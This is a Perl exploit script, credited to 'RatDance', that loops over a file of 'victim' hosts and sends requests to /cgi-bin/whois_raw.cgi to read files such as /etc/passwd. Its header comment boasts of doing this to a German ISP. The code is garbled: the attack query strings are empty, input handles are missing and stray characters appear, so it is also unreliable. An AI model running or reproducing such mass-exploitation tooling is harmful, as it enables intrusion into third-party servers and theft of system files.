########################################################################## # This is a script that checks for the cgi whois_raw vulnerabillity. # # The idea was inspired after having pulled up an encrypted /etc/passwd # # file on a German ISP using the /cgi-bin/whois_raw.cgi? vulnerabillity. # # This code was ripped from iisscan by Piffy. # ########################################################################## use strict; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; my $def = new LWP::UserAgent; my @victim; my $userresp; print "\nNeoErudition Technologies\n"; print "Whois_raw cgi exploit\n\n"; print "\nCoded by RatDance\n"; print "Enter Y or N to continue. [Y/N]: "; while(1) { chomp($userresp = ); if($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") { print "Continueing...\n"; last; } elsif($userresp eq "N" || $userresp eq "n" || $userresp eq "no") { print "Exiting as requested.\n"; exit; } else { print "Thats not a valid answer. [Y/N]: "; } } print "\nWhat file contains the victim address: "; chomp(my $victim=); open(IN, $victim) || die "\nCould not open $victim: $!"; while () { $victim[$a] = $_; chomp $victim[$a]; $a++; $b++; } close(IN); $a = 0; print "whois raw exploit initiated..\n"; while ($a < $b) { my $url="http://$victim[$a]/cgi-bin/whois_raw.cgi? "; my $request = new HTTP::Request('GET', $url); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>exploit_whois.log"); print OUT "\n$victim[$a] : $response->content"; -close OUT; } else { print $response->error_as_HTML; } &second() } sub second() { my $url2="http://$victim[$a]/cgi-bin/whois_raw.cgi? "; my $request = new HTTP::Request('GET', $url2); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>exploit_whois.log"); print OUT "\n$victim[$a] : $response->content"; -close OUT; } else { print $response->error_as_HTML; } $a++; }